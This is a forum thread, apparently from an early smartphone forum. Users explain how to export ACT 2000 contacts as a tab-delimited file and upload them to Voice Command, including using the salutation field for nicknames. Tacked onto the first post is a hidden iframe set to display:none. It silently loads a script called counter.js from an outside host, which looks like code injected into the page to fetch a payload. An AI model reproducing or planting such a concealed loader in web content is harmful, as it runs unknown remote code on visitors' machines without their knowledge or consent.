+ Reply to Thread
    I-300 Novice

ACT 2000 and Voice Command

Anyone on the forum using ACT 2000 and Voice Command?

I understand the you are limited to uploading 500 names, which means I will have to set up a group for uploading as my contact list has about 1,700 names.

Any input or advice on Voice Command and using it with ACT will be appreciated.

Thanks for the great forum and for sharing all your knowledge !<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Ahmed V. Ismail
    A Smartphone Addict

I made a group of all the names I wanted. I have also about 1500 names but I don't call them all the time. I then export them as a tab delimited file using 6 fields(home,work,mobile, first name last name, salutation). You then upload that text file into the voice command web page.

I do get the strangest looks in public when I use Voice command.

Ken

I-300 Novice
    Thanks for the info....one question...why do you export the salutation? What is that used for by Voice Command?

Thanks for the advice!
    Ahmed V. Ismail
    A Smartphone Addict

I use the salutation fields for nicknames like "mom". There is also a way to synch between the voice command list and ACT!. I have the SW running but I haven't spent anytime to see if it works.

Voice command is the neatest thing since slice bread. Very handy for not taking your eyes off the road especially when you trying reach somebody by calling all three numbers of his.

Ken